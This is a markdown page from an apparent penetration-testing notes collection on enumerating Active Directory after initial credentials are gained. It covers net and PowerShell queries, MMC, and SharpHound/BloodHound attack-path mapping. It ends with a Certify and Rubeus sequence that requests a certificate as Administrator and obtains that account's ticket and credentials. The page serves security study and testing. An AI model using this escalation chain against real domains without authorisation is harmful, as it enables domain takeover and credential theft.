killchain-compendium/Miscellaneous/Active Directory/ad_enumeration.md

4.1 KiB

Enumerate Active Directory

Enumeration following after initial credentials are gained

SYSVOL

  • On windows use runas and gain local administrative permissions via
runas.exe /netonly /user:%FQDNORNETBIOSDOMAIN%\%USERNAME% cmd.exe
  • Check validity of credentials against SYSVOL, it stores Group Policy Objects (GPO). Every AD account will gain access
    • Query DNS, for example the DC
$dnsip = "<DC IPaddress>"
$index = Get-NetAdapter -Name '<Ethernet>' | Select-Object -ExpandProperty 'ifIndex'
Set-DnsClientServerAddress -InterfaceIndex $index -ServerAddresses $dnsip
* Check `SYSVOL` afterwards via `hostname` to verify via Kerberos auth
dir \\%HOSTNAME%\SYSVOL\
* Check `SYSVOL` via `IP` address to force `NTLM` authentication

Microsoft Management Console (MMC)

  • Use AD Snap-ins of Remote Server Administrative Tools
    • Start -> Apps & Features -> Manage Optional Features -> Add a feature -> Search RSAT -> Select RSAT: Active Directory Domain Services and Lightweight Directory Tools -> Install
    • Win + r -> MMC -> File -> Add/Remove Snap-in -> add 3 AD feature snap-ins -> right click Active Directory Sites and Services -> Change Forest -> Add root domain -> right click Active Directory Users and Computers -> Change Domain -> enter root domain -> right click Active Directory Users and Computers -> View -> Advanced Features
    • Start enumerating via click on the domain object in the tree on the left
    • Take a look at People directory -> right click on them to see properties
    • Change or create user or change groups
    • Also use MMC to enumerate

CMD enumeration

Execute from domain joined machine

  • Users
net user /domain
  • Specific user
net user <username> /domain
  • Groups
net group /domain
  • Specific group
net group <groupname> /domain
  • Password Policy via accounts
net accounts /domain

Powershell Cmdlets

  • User details via
 Get-ADUser -Identity <username> -Server <fqdn/or/DCdomain> -Properties *
  • Groups
Get-ADGroup -Identity Administrators -Server exampleDC.com  -Properties *
  • Group membership
Get-ADGroupMember -Identity Administrators -Server exampleDC.com
  • Generic AD objects
Get-ADObject -Filter <filterstuff>  -includeDeletedObjects -Server exampleDC.com
Get-ADObject -Filter 'badPwdCount -gt 0' -Server exampleDC.com
  • Domains
 Get-ADDomain -Server exampleDC.com

Sharphound and Bloodhound

  • BloodHound documentation

  • Change to AD user via runas.exe and collect via one of the following

    • Sharphound.ps1
    • sharphound.exe
    • Azurehound.ps1
  • For example

Sharphound.exe --CollectionMethods <Default/Session/All> --Domain example.com --ExcludeDCs
  • After some time collect the current sessions via
Sharphound.exe --CollectionMethods Session --Domain example.com --ExcludeDCs
  • Start neo4j db
neo4j console start
  • Start bloodhound
bloodhound --no-sandbox
  • Drag and Drop the zip file from Sharphound
  • Either search for AD objects and use Analysis to find an attack path through the info on the edges
  • Shows exploitable accounts in the Analysis tab, for example kerberroastable accounts

LDAP

PowerView

WMI

Find Certifications and Private Keys

Certification Services can be found with the Certify tool.

  • Enumerate vunerabilities on the current user via Certify, use FullName found in the first step to insert domain in the second step
Certify.exe find /vulnerable /currentuser
.\Certify.exe request /ca:$FULL_NAME /template:UserAuthentication /altname:Administrator
  • Copy the found key and convert it like mentioned in the last line of the ouptut, for example
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
  • Get ticket with the the loot via Rubeus
.\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /getcredentials